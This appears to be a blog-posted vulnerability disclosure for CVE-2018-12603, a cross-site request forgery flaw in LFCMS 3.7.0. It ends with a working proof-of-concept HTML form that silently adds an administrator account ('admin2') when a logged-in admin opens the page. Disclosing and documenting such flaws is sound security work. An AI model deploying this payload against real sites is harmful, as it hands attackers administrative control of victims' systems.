CVE-2018-12603:LFCMS_3.7.0

CVE-2018-12603
 
> [Suggested description]
> A CSRF vulnerability exists in LFCMS 3.7.0: administrator account can be added arbitrarily.
>
> ------------------------------------------

> [Discoverer]
> Bay0net from JZXTSEC
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Request Forgery (CSRF)
>
> ------------------------------------------
>
>
> ------------------------------------------

> [Affected Product Code Base]
> LFCMS - 3.7.0

> ------------------------------------------

> [Affected Component]
> After the administrator logged in, open the following page,which will add users.
https://www.cnblogs.com/v1vvwv/p/9203899.html 

> ------------------------------------------

> [Attack Type]
> Remote

> ------------------------------------------

> [Impact Code execution]
> true

> ------------------------------------------

> [Impact Escalation of Privileges]
> true

> ------------------------------------------

> [Attack Vectors]
> Affected component

> ------------------------------------------

> [Reference]
https://www.cnblogs.com/v1vvwv/p/9203899.html 
http://www.lfdycms.com/home/down/index/id/26.html

> ------------------------------------------
A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily.
 
After the administrator logged in, open the following page,which will add administrator account.
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST">
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="admin2" />
      <input type="hidden" name="repassword" value="admin2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  

 

References:

http://www.lfdycms.com/

http://www.lfdycms.com/home/lists/index/id/60.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12603

posted @ 2018-06-20 15:10 Bay0net 阅读(...) 评论(...) 编辑 收藏